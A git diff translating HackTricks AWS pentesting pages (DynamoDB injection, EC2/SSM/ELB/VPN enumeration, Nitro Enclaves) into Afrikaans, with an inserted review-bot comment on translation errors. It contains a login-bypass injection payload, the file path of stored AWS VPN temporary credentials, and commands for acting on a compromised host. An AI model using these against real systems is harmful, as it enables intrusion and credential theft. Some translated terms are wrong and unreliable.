Injection -Some SDKs allows to use a string indicating the filtering to be performed like: - +Sommige SDK's laat 'n string toe wat die filtrering aandui wat uitgevoer moet word, soos: ```java new ScanSpec().withProjectionExpression("UserName").withFilterExpression(user_input+" = :username and Password = 
:password").withValueMap(valueMap) ``` +U moet weet dat soek in DynamoDB vir **substitusie** van 'n attribuut **waarde** in **filteruitdrukkings** terwyl die items gescan word, die tokens moet **begin** met die **`:`** karakter. Sulke tokens sal **vervang** word met die werklike **attribuutwaarde tydens uitvoering**. -You need to know that searching in DynamoDB for **substituting** an attribute **value** in **filter expressions** while scanning the items, the tokens should **begin** with the **`:`** character. Such tokens will be **replaced** with actual **attribute value at runtime**. - -Therefore, a login like the previous one can be bypassed with something like: - +Daarom kan 'n aanmelding soos die vorige omseil word met iets soos: ```bash :username = :username or :username # This will generate the query: # :username = :username or :username = :username and Password = :password # which is always true ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md index f365bc7f5..1443115a1 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md @@ -4,7 +4,7 @@ ## VPC & Networking -Learn what a VPC is and about its components in: +Leer wat 'n VPC is en oor sy komponente in: {{#ref}} aws-vpc-and-networking-basic-information.md 
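Review bot: in the NoSQL Inspuiting section of the `@@ -54,129 +53,112 @@` hunk the blank line between the `> [!NOTE]` callout and the following paragraph is removed, so `+As jy die **vergelyking** wat uitgevoer word kan **verander** ...` directly follows `+> Trouens, **Query** aksies ...`. In CommonMark a plain paragraph line right after a blockquote line is lazy continuation, so that sentence will render inside the NOTE callout instead of as body text; restore the blank line. The other blank-line removals in the hunk are mostly harmless (a code fence can interrupt a paragraph), but dropping the one between "al die inhoud." and "+Byvoorbeeld, inspuiting ..." merges two paragraphs into one. Wording: "Rauwe Json-inspuiting", "injecteer" and "kwetsbare" are Dutch forms; Afrikaans is "Rou", "inspuit" and "kwesbare" (the last already used two lines earlier in the `[!CAUTION]` callout). "regstel die "EQ" voorwaarde wat soek na die ID 1000" is not a sentence; something like "bevredig die "EQ"-voorwaarde vir ID 1000 en soek dan ..." carries the meaning. And the `:property Injection` paragraph switches to the formal "U moet weet" while the rest of the patch addresses the reader as "jy".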
@@ -12,37 +12,36 @@ aws-vpc-and-networking-basic-information.md ## EC2 -Amazon EC2 is utilized for initiating **virtual servers**. It allows for the configuration of **security** and **networking** and the management of **storage**. The flexibility of Amazon EC2 is evident in its ability to scale resources both upwards and downwards, effectively adapting to varying requirement changes or surges in popularity. This feature diminishes the necessity for precise traffic predictions. +Amazon EC2 word gebruik om **virtuele bedieners** te begin. Dit stel die konfigurasie van **sekuriteit** en **netwerk** en die bestuur van **berging** moontlik. Die buigsaamheid van Amazon EC2 is duidelik in sy vermoĂ« om hulpbronne opwaarts en afwaarts te skaal, wat effektief aanpas by verskillende vereiste veranderinge of toename in gewildheid. Hierdie kenmerk verminder die noodsaaklikheid vir presiese verkeersvoorspellings. -Interesting things to enumerate in EC2: +Interessante dinge om in EC2 te enumereer: -- Virtual Machines - - SSH Keys - - User Data - - Existing EC2s/AMIs/Snapshots -- Networking - - Networks - - Subnetworks - - Public IPs - - Open ports -- Integrated connections with other networks outside AWS +- Virtuele Masjiene +- SSH Sleutels +- Gebruikersdata +- Bestaande EC2s/AMIs/Snapshots +- Netwerk +- Netwerke +- Subnetwerke +- Publieke IPs +- Oop poorte +- GeĂŻntegreerde verbindings met ander netwerke buite AWS ### Instance Profiles -Using **roles** to grant permissions to applications that run on **EC2 instances** requires a bit of extra configuration. An application running on an EC2 instance is abstracted from AWS by the virtualized operating system. Because of this extra separation, you need an additional step to assign an AWS role and its associated permissions to an EC2 instance and make them available to its applications. +Om **rolle** te gebruik om toestemmings aan toepassings wat op **EC2-instances** loop te verleen, vereis 'n bietjie ekstra konfigurasie. 
'n Toepassing wat op 'n EC2-instance loop, is geabstraheer van AWS deur die gevirtualiseerde bedryfstelsel. As gevolg van hierdie ekstra skeiding, benodig jy 'n bykomende stap om 'n AWS-rol en sy geassosieerde toestemmings aan 'n EC2-instance toe te ken en dit beskikbaar te maak vir sy toepassings. -This extra step is the **creation of an** [_**instance profile**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html) attached to the instance. The **instance profile contains the role and** can provide the role's temporary credentials to an application that runs on the instance. Those temporary credentials can then be used in the application's API calls to access resources and to limit access to only those resources that the role specifies. Note that **only one role can be assigned to an EC2 instance** at a time, and all applications on the instance share the same role and permissions. +Hierdie ekstra stap is die **skepping van 'n** [_**instance profile**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html) wat aan die instance geheg is. Die **instance profile bevat die rol en** kan die rol se tydelike akrediteerings aan 'n toepassing wat op die instance loop, verskaf. Daardie tydelike akrediteerings kan dan in die toepassing se API-oproepe gebruik word om toegang tot hulpbronne te verkry en om toegang te beperk tot slegs daardie hulpbronne wat die rol spesifiseer. Let daarop dat **slegs een rol aan 'n EC2-instance** op 'n slag toegeken kan word, en alle toepassings op die instance deel dieselfde rol en toestemmings. ### Metadata Endpoint -AWS EC2 metadata is information about an Amazon Elastic Compute Cloud (EC2) instance that is available to the instance at runtime. This metadata is used to provide information about the instance, such as its instance ID, the availability zone it is running in, the IAM role associated with the instance, and the instance's hostname. 
+AWS EC2 metadata is inligting oor 'n Amazon Elastic Compute Cloud (EC2) instance wat beskikbaar is vir die instance tydens uitvoering. Hierdie metadata word gebruik om inligting oor die instance te verskaf, soos sy instance ID, die beskikbaarheidsone waarin dit loop, die IAM-rol wat met die instance geassosieer is, en die instance se gasheernaam. {{#ref}} https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf {{#endref}} ### Enumeration - ```bash # Get EC2 instances aws ec2 describe-instances @@ -50,10 +49,10 @@ aws ec2 describe-instance-status #Get status from running instances # Get user data from each ec2 instance for instanceid in $(aws ec2 describe-instances --profile --region us-west-2 | grep -Eo '"i-[a-zA-Z0-9]+' | tr -d '"'); do - echo "Instance ID: $instanceid" - aws ec2 describe-instance-attribute --profile --region us-west-2 --instance-id "$instanceid" --attribute userData | jq ".UserData.Value" | tr -d '"' | base64 -d - echo "" - echo "-------------------" +echo "Instance ID: $instanceid" +aws ec2 describe-instance-attribute --profile --region us-west-2 --instance-id "$instanceid" --attribute userData | jq ".UserData.Value" | tr -d '"' | base64 -d +echo "" +echo "-------------------" done # Instance profiles @@ -128,16 +127,15 @@ aws ec2 describe-route-tables aws ec2 describe-vpcs aws ec2 describe-vpc-peering-connections ``` - -### Unauthenticated Access +### Ongeauthentiseerde Toegang {{#ref}} ../../aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md {{#endref}} -### Privesc +### Privilege Escalation -In the following page you can check how to **abuse EC2 permissions to escalate privileges**: +In die volgende bladsy kan jy kyk hoe om **EC2-toestemmings te misbruik om voorregte te verhoog**: {{#ref}} ../../aws-privilege-escalation/aws-ec2-privesc.md 
@@ -151,17 +149,17 @@ In the following page you can check how to **abuse EC2 permissions to escalate p ## EBS -Amazon **EBS** (Elastic Block Store) **snapshots** are basically static **backups** of AWS EBS volumes. In other words, they are **copies** of the **disks** attached to an **EC2** Instance at a specific point in time. EBS snapshots can be copied across regions and accounts, or even downloaded and run locally. +Amazon **EBS** (Elastic Block Store) **snapshots** is basies statiese **rugsteun** van AWS EBS volumes. Met ander woorde, dit is **kopieĂ«** van die **skywe** wat aan 'n **EC2** instansie op 'n spesifieke tydstip geheg is. EBS snapshots kan oor streke en rekeninge gekopieer word, of selfs afgelaai en plaaslik uitgevoer word. -Snapshots can contain **sensitive information** such as **source code or APi keys**, therefore, if you have the chance, it's recommended to check it. +Snapshots kan **sensitiewe inligting** soos **bronkode of API sleutels** bevat, daarom, as jy die kans het, word dit aanbeveel om dit na te gaan. -### Difference AMI & EBS +### Verskil tussen AMI & EBS -An **AMI** is used to **launch an EC2 instance**, while an EC2 **Snapshot** is used to **backup and recover data stored on an EBS volume**. While an EC2 Snapshot can be used to create a new AMI, it is not the same thing as an AMI, and it does not include information about the operating system, application server, or other software required to run an application. +'n **AMI** word gebruik om 'n **EC2 instansie te begin**, terwyl 'n EC2 **Snapshot** gebruik word om **data wat op 'n EBS volume gestoor is, te rugsteun en te herstel**. Terwyl 'n EC2 Snapshot gebruik kan word om 'n nuwe AMI te skep, is dit nie dieselfde as 'n AMI nie, en dit sluit nie inligting oor die bedryfstelsel, toepassingsbediener, of ander sagteware wat benodig word om 'n toepassing te laat werk, in nie. 
-### Privesc +### Privilege Escalation -In the following page you can check how to **abuse EBS permissions to escalate privileges**: +In die volgende bladsy kan jy kyk hoe om **EBS-toestemmings te misbruik om voorregte te verhoog**: {{#ref}} ../../aws-privilege-escalation/aws-ebs-privesc.md 
@@ -169,14 +167,13 @@ In the following page you can check how to **abuse EBS permissions to escalate p ## SSM -**Amazon Simple Systems Manager (SSM)** allows to remotely manage floats of EC2 instances to make their administrations much more easy. Each of these instances need to be running the **SSM Agent service as the service will be the one getting the actions and performing them** from the AWS API. +**Amazon Simple Systems Manager (SSM)** maak dit moontlik om afstandsgewys 'n vloot van EC2 instansies te bestuur om hul administrasies baie makliker te maak. Elke een van hierdie instansies moet die **SSM Agent diens aan hĂȘ, aangesien die diens die een sal wees wat die aksies ontvang en uitvoer** vanaf die AWS API. -**SSM Agent** makes it possible for Systems Manager to update, manage, and configure these resources. The agent **processes requests from the Systems Manager service in the AWS Cloud**, and then runs them as specified in the request. +**SSM Agent** maak dit moontlik vir Systems Manager om hierdie hulpbronne op te dateer, te bestuur en te konfigureer. Die agent **verwerk versoeke van die Systems Manager diens in die AWS Cloud**, en voer dit dan uit soos gespesifiseer in die versoek. -The **SSM Agent comes**[ **preinstalled in some AMIs**](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html) or you need to [**manually install them**](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html) on the instances. Also, the IAM Role used inside the instance needs to have the policy **AmazonEC2RoleforSSM** attached to be able to communicate. - -### Enumeration +Die **SSM Agent kom**[ **vooraf geĂŻnstalleer in sommige AMIs**](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html) of jy moet dit [**handmatig installeer**](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html) op die instansies. 
Ook, die IAM Rol wat binne die instansie gebruik word, moet die beleid **AmazonEC2RoleforSSM** aangeheg hĂȘ om te kan kommunikeer. +### Enumerasie ```bash aws ssm describe-instance-information aws ssm describe-parameters @@ -185,16 +182,13 @@ aws ssm describe-instance-patches --instance-id aws ssm describe-instance-patch-states --instance-ids aws ssm describe-instance-associations-status --instance-id ``` - -You can check in an EC2 instance if Systems Manager is runnign just by executing: - +U kan in 'n EC2-instansie nagaan of Systems Manager loop deur eenvoudig die volgende uit te voer: ```bash ps aux | grep amazon-ssm ``` - ### Privesc -In the following page you can check how to **abuse SSM permissions to escalate privileges**: +In die volgende bladsy kan jy kyk hoe om **SSM-toestemmings te misbruik om voorregte te verhoog**: {{#ref}} ../../aws-privilege-escalation/aws-ssm-privesc.md @@ -202,10 +196,9 @@ In the following page you can check how to **abuse SSM permissions to escalate p ## ELB -**Elastic Load Balancing** (ELB) is a **load-balancing service for Amazon Web Services** (AWS) deployments. ELB automatically **distributes incoming application traffic** and scales resources to meet traffic demands. +**Elastic Load Balancing** (ELB) is 'n **laaibelastingdiens vir Amazon Web Services** (AWS) ontplooiings. ELB versprei outomaties **inkomende toepassingsverkeer** en skaal hulpbronne om aan verkeersvereistes te voldoen. ### Enumeration - ```bash # List internet-facing ELBs aws elb describe-load-balancers @@ -216,11 +209,9 @@ aws elbv2 describe-load-balancers aws elbv2 describe-load-balancers | jq '.LoadBalancers[].DNSName' aws elbv2 describe-listeners --load-balancer-arn ``` +## Ontwerp Sjablone & Outomatiese Skaal Groepe -## Launch Templates & Autoscaling Groups - -### Enumeration - +### Opname ```bash # Launch templates aws ec2 describe-launch-templates 
@@ -235,12 +226,11 @@ aws autoscaling describe-launch-configurations aws autoscaling describe-load-balancer-target-groups aws autoscaling describe-load-balancers ``` - ## Nitro -AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture. +AWS Nitro is 'n suite van **innoverende tegnologieĂ«** wat die onderliggende platform vir AWS EC2-instances vorm. Ingevoerd deur Amazon om **veiligheid, prestasie en betroubaarheid** te **verbeter**, benut Nitro pasgemaakte **hardeware-komponente en 'n liggewig hypervisor**. Dit abstraheer baie van die tradisionele virtualisering funksionaliteit na toegewyde hardeware en sagteware, **minimaliseer die aanvaloppervlak** en verbeter hulpbron doeltreffendheid. Deur virtualisering funksies af te laai, laat Nitro EC2-instances toe om **naby bare-metal prestasie** te lewer, wat dit veral voordelig maak vir hulpbron-intensiewe toepassings. Boonop verseker die Nitro Security Chip spesifiek die **veiligheid van die hardeware en firmware**, wat sy robuuste argitektuur verder versterk. -Get more information and how to enumerate it from: +Kry meer inligting en hoe om dit te enumereer vanaf: {{#ref}} aws-nitro-enum.md 
@@ -248,35 +238,34 @@ aws-nitro-enum.md ## VPN -A VPN allows to connect your **on-premise network (site-to-site VPN)** or the **workers laptops (Client VPN)** with a **AWS VPC** so services can accessed without needing to expose them to the internet. +'n VPN laat jou toe om jou **on-premise netwerk (site-to-site VPN)** of die **werkers se skootrekenaars (Client VPN)** met 'n **AWS VPC** te verbind sodat dienste sonder blootstelling aan die internet verkry kan word. -#### Basic AWS VPN Components +#### Basiese AWS VPN Komponente -1. **Customer Gateway**: - - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection. - - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection. - - You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway. - - It serves as a reference point for setting up the VPN connection and doesn't incur additional charges. -2. **Virtual Private Gateway**: - - A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection. - - It is attached to your VPC and serves as the target for your VPN connection. - - VPG is the AWS side endpoint for the VPN connection. - - It handles the secure communication between your VPC and your on-premises network. -3. **Site-to-Site VPN Connection**: - - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel. - - This type of connection requires a Customer Gateway and a Virtual Private Gateway. - - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment. - - Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection. -4. 
**Client VPN Endpoint**: - - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions. - - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network. - - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks. - - With Client VPN, each client device uses a VPN client software to establish a secure connection. +1. **KliĂ«nt Gateway**: +- 'n KliĂ«nt Gateway is 'n hulpbron wat jy in AWS skep om jou kant van 'n VPN-verbinding te verteenwoordig. +- Dit is essensieel 'n fisiese toestel of sagtewaretoepassing aan jou kant van die Site-to-Site VPN-verbinding. +- Jy verskaf routering inligting en die publieke IP-adres van jou netwerktoestel (soos 'n router of 'n firewall) aan AWS om 'n KliĂ«nt Gateway te skep. +- Dit dien as 'n verwysingspunt vir die opstelling van die VPN-verbinding en veroorsaak geen addisionele koste nie. +2. **Virtuele Privaat Gateway**: +- 'n Virtuele Privaat Gateway (VPG) is die VPN-konsentrasie aan die Amazon kant van die Site-to-Site VPN-verbinding. +- Dit is aan jou VPC geheg en dien as die teiken vir jou VPN-verbinding. +- VPG is die AWS kant eindpunt vir die VPN-verbinding. +- Dit hanteer die veilige kommunikasie tussen jou VPC en jou on-premises netwerk. +3. **Site-to-Site VPN Verbinding**: +- 'n Site-to-Site VPN-verbinding verbind jou on-premises netwerk met 'n VPC deur 'n veilige, IPsec VPN-tunnel. +- Hierdie tipe verbinding vereis 'n KliĂ«nt Gateway en 'n Virtuele Privaat Gateway. +- Dit word gebruik vir veilige, stabiele, en konsekwente kommunikasie tussen jou datacentrum of netwerk en jou AWS-omgewing. +- Gewoonlik gebruik vir gereelde, langtermynverbindinge en word gefaktureer op grond van die hoeveelheid data wat oor die verbinding oorgedra word. +4. 
**KliĂ«nt VPN Eindpunt**: +- 'n KliĂ«nt VPN eindpunt is 'n hulpbron wat jy in AWS skep om kliĂ«nt VPN-sessies te aktiveer en te bestuur. +- Dit word gebruik om individuele toestelle (soos skootrekenaars, slimfone, ens.) veilig te laat aansluit op AWS-hulpbronne of jou on-premises netwerk. +- Dit verskil van Site-to-Site VPN in die sin dat dit ontwerp is vir individuele kliĂ«nte eerder as om hele netwerke te verbind. +- Met KliĂ«nt VPN gebruik elke kliĂ«nttoestel 'n VPN-kliĂ«nt sagteware om 'n veilige verbinding te vestig. -You can [**find more information about the benefits and components of AWS VPNs here**](aws-vpc-and-networking-basic-information.md#vpn). +Jy kan [**meer inligting oor die voordele en komponente van AWS VPNs hier vind**](aws-vpc-and-networking-basic-information.md#vpn). ### Enumeration - ```bash # VPN endpoints ## Check used subnetwork, authentication, SGs, connected... 
@@ -300,31 +289,26 @@ aws ec2 describe-vpn-gateways # Get VPN site-to-site connections aws ec2 describe-vpn-connections ``` +### Plaaslike Enumerasie -### Local Enumeration +**Plaaslike Tydelike Kredensiale** -**Local Temporary Credentials** +Wanneer AWS VPN-kliĂ«nt gebruik word om met 'n VPN te verbind, sal die gebruiker gewoonlik **in AWS aanmeld** om toegang tot die VPN te verkry. Dan, word daar **AWS-kredensiale geskep en plaaslik gestoor** om die VPN-verbinding te vestig. Hierdie kredensiale word **gestoor in** `$HOME/.config/AWSVPNClient/TemporaryCredentials//temporary-credentials.txt` en bevat 'n **AccessKey**, 'n **SecretKey** en 'n **Token**. -When AWS VPN Client is used to connect to a VPN, the user will usually **login in AWS** to get access to the VPN. Then, some **AWS credentials are created and stored** locally to establish the VPN connection. These credentials are **stored in** `$HOME/.config/AWSVPNClient/TemporaryCredentials//temporary-credentials.txt` and contains an **AccessKey**, a **SecretKey** and a **Token**. +Die kredensiale behoort aan die gebruiker `arn:aws:sts:::assumed-role/aws-vpn-client-metrics-analytics-access-role/CognitoIdentityCredentials` (TODO: navorsing oor die toestemmings van hierdie kredensiale). -The credentials belong to the user `arn:aws:sts:::assumed-role/aws-vpn-client-metrics-analytics-access-role/CognitoIdentityCredentials` (TODO: research more about the permissions of this credentials). +**opvn konfigurasie lĂȘers** -**opvn config files** +As 'n **VPN-verbinding gevestig is**, moet jy soek na **`.opvn`** konfigurasie lĂȘers in die stelsel. Boonop, een plek waar jy die **konfigurasies** kan vind is in **`$HOME/.config/AWSVPNClient/OpenVpnConfigs`** -If a **VPN connection was stablished** you should search for **`.opvn`** config files in the system. 
Moreover, one place where you could find the **configurations** is in **`$HOME/.config/AWSVPNClient/OpenVpnConfigs`** - -#### **Post Exploitaiton** +#### **Post Exploitatie** {{#ref}} ../../aws-post-exploitation/aws-vpn-post-exploitation.md {{#endref}} -## References +## Verwysings - [https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html](https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md index 0575a17d8..604d75a66 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md 
@@ -4,19 +4,18 @@ ## Basic Information -AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture. +AWS Nitro is 'n suite van **innovatiewe tegnologieĂ«** wat die onderliggende platform vir AWS EC2-instanties vorm. Ingevoerd deur Amazon om **veiligheid, prestasie en betroubaarheid** te **verbeter**, benut Nitro op maat gemaakte **hardeware-komponente en 'n liggewig hypervisor**. Dit abstraheer baie van die tradisionele virtualisering funksionaliteit na toegewyde hardeware en sagteware, **minimaliseer die aanvaloppervlak** en verbeter hulpbron doeltreffendheid. Deur virtualisering funksies af te laai, laat Nitro EC2-instanties toe om **naby bare-metal prestasie** te lewer, wat dit veral voordelig maak vir hulpbron-intensiewe toepassings. Boonop verseker die Nitro Security Chip spesifiek die **veiligheid van die hardeware en firmware**, wat sy robuuste argitektuur verder versterk. ### Nitro Enclaves -**AWS Nitro Enclaves** provides a secure, **isolated compute environment within Amazon EC2 instances**, specifically designed for processing highly sensitive data. Leveraging the AWS Nitro System, these enclaves ensure robust **isolation and security**, ideal for **handling confidential information** such as PII or financial records. 
They feature a minimalist environment, significantly reducing the risk of data exposure. Additionally, Nitro Enclaves support cryptographic attestation, allowing users to verify that only authorized code is running, crucial for maintaining strict compliance and data protection standards. +**AWS Nitro Enclaves** bied 'n veilige, **geĂŻsoleerde rekenaaromgewing binne Amazon EC2-instanties**, spesifiek ontwerp vir die verwerking van hoogs sensitiewe data. Deur die AWS Nitro-stelsel te benut, verseker hierdie enclaves robuuste **isolasie en veiligheid**, ideaal vir **die hantering van vertroulike inligting** soos PII of finansiĂ«le rekords. Hulle beskik oor 'n minimalistiese omgewing, wat die risiko van data blootstelling aansienlik verminder. Boonop ondersteun Nitro Enclaves kriptografiese attestering, wat gebruikers in staat stel om te verifieer dat slegs geautoriseerde kode loop, wat van kardinale belang is vir die handhawing van streng nakoming en databeskermingsstandaarde. > [!CAUTION] -> Nitro Enclave images are **run from inside EC2 instances** and you cannot see from the AWS web console if an EC2 instances is running images in Nitro Enclave or not. +> Nitro Enclave-beelde word **van binne EC2-instanties uitgevoer** en jy kan nie vanaf die AWS-webkonsol sien of 'n EC2-instantie beelde in Nitro Enclave uitvoer of nie. ## Nitro Enclave CLI installation -Follow the all instructions [**from the documentation**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave). However, these are the most important ones: - +Volg al die instruksies [**uit die dokumentasie**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave). Hierdie is egter die belangrikste: ```bash # Install tools sudo amazon-linux-extras install aws-nitro-enclaves-cli -y 
@@ -32,47 +31,39 @@ nitro-cli --version # Start and enable the Nitro Enclaves allocator service. sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable nitro-enclaves-allocator.service ``` +## Nitro Enclave Beelde -## Nitro Enclave Images - -The images that you can run in Nitro Enclave are based on docker images, so you can create your Nitro Enclave images from docker images like: - +Die beelde wat jy in Nitro Enclave kan hardloop, is gebaseer op docker beelde, so jy kan jou Nitro Enclave beelde van docker beelde soos: ```bash # You need to have the docker image accesible in your running local registry # Or indicate the full docker image URL to access the image nitro-cli build-enclave --docker-uri : --output-file nitro-img.eif ``` +Soos jy kan sien, gebruik die Nitro Enclave beelde die uitbreiding **`eif`** (Enclave Image File). -As you can see the Nitro Enclave images use the extension **`eif`** (Enclave Image File). - -The output will look similar to: - +Die uitvoer sal soortgelyk lyk aan: ``` Using the locally available Docker image... Enclave Image successfully created. { - "Measurements": { - "HashAlgorithm": "Sha384 { ... }", - "PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284", - "PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f", - "PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3" - } +"Measurements": { +"HashAlgorithm": "Sha384 { ... 
}", +"PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284", +"PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f", +"PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3" +} } ``` - ### Run an Image -As per [**the documentation**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave), in order to run an enclave image you need to assign it memory of **at least 4 times the size of the `eif` file**. It's possible to configure the default resources to give to it in the file - +Soos per [**die dokumentasie**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave), om 'n enclave beeld te laat loop, moet jy dit toewys met geheue van **ten minste 4 keer die grootte van die `eif` lĂȘer**. Dit is moontlik om die standaard hulpbronne wat aan dit gegee moet word in die lĂȘer te konfigureer. ```shell /etc/nitro_enclaves/allocator.yaml ``` - > [!CAUTION] -> Always remember that you need to **reserve some resources for the parent EC2** instance also! - -After knowing the resources to give to an image and even having modified the configuration file it's possible to run an enclave image with: +> Onthou altyd dat jy **ook 'n paar hulpbronne vir die ouer EC2** instansie moet **bespreek**! +Nadat jy die hulpbronne weet wat aan 'n beeld gegee moet word en selfs die konfigurasie-lĂȘer gewysig het, is dit moontlik om 'n enklave-beeld te laat loop met: ```shell # Restart the service so the new default values apply sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable nitro-enclaves-allocator.service 
@@ -80,80 +71,72 @@ sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable n # Indicate the CPUs and memory to give nitro-cli run-enclave --cpu-count 2 --memory 3072 --eif-path hello.eif --debug-mode --enclave-cid 16 ``` - ### Enumerate Enclaves -If you compromise and EC2 host it's possible to get a list of running enclave images with: - +As jy 'n EC2-gasheer kompromitteer, is dit moontlik om 'n lys van hardloopende enklave-beelde te kry met: ```bash nitro-cli describe-enclaves ``` - -It's **not possible to get a shell** inside a running enclave image because thats the main purpose of enclave, however, if you used the parameter **`--debug-mode`**, it's possible to get the **stdout** of it with: - +Dit is **nie moontlik om 'n shell** binne 'n lopende enklave-beeld te kry nie, omdat dit die hoofdoel van die enklave is, egter, as jy die parameter **`--debug-mode`** gebruik, is dit moontlik om die **stdout** daarvan te kry met: ```shell ENCLAVE_ID=$(nitro-cli describe-enclaves | jq -r ".[0].EnclaveID") nitro-cli console --enclave-id ${ENCLAVE_ID} ``` - ### Terminate Enclaves -If an attacker compromise an EC2 instance by default he won't be able to get a shell inside of them, but he will be able to **terminate them** with: - +As 'n aanvaller 'n EC2-instantie kompromitteer, sal hy standaard nie in staat wees om 'n shell binne-in hulle te kry nie, maar hy sal in staat wees om hulle te **terminate** met: ```shell nitro-cli terminate-enclave --enclave-id ${ENCLAVE_ID} ``` - ## Vsocks -The only way to communicate with an **enclave** running image is using **vsocks**. +Die enigste manier om te kommunikeer met 'n **enclave** wat 'n beeld uitvoer, is deur **vsocks**. -**Virtual Socket (vsock)** is a socket family in Linux specifically designed to facilitate **communication** between virtual machines (**VMs**) and their **hypervisors**, or between VMs **themselves**. 
Vsock enables efficient, **bi-directional communication** without relying on the host's networking stack. This makes it possible for VMs to communicate even without network configurations, **using a 32-bit Context ID (CID) and port numbers** to identify and manage connections. The vsock API supports both stream and datagram socket types, similar to TCP and UDP, providing a versatile tool for user-level applications in virtual environments. +**Virtual Socket (vsock)** is 'n soketfamilie in Linux wat spesifiek ontwerp is om **kommunikasie** tussen virtuele masjiene (**VMs**) en hul **hypervisors**, of tussen VMs **selfs** te fasiliteer. Vsock stel doeltreffende, **bi-rigting kommunikasie** in staat sonder om op die gasheer se netwerkstapel te staatmaak. Dit maak dit moontlik vir VMs om te kommunikeer selfs sonder netwerk konfigurasies, **met 'n 32-bis Context ID (CID) en poortnommers** om verbindings te identifiseer en te bestuur. Die vsock API ondersteun beide stroom- en datagram soket tipes, soortgelyk aan TCP en UDP, wat 'n veelsydige hulpmiddel bied vir gebruikersvlak toepassings in virtuele omgewings. > [!TIP] -> Therefore, an vsock address looks like this: `:` +> Daarom lyk 'n vsock adres soos volg: `:` -To find **CIDs** of the enclave running images you could just execute the following cmd and thet the **`EnclaveCID`**: +Om **CIDs** van die enclave wat beelde uitvoer te vind, kan jy eenvoudig die volgende cmd uitvoer en die 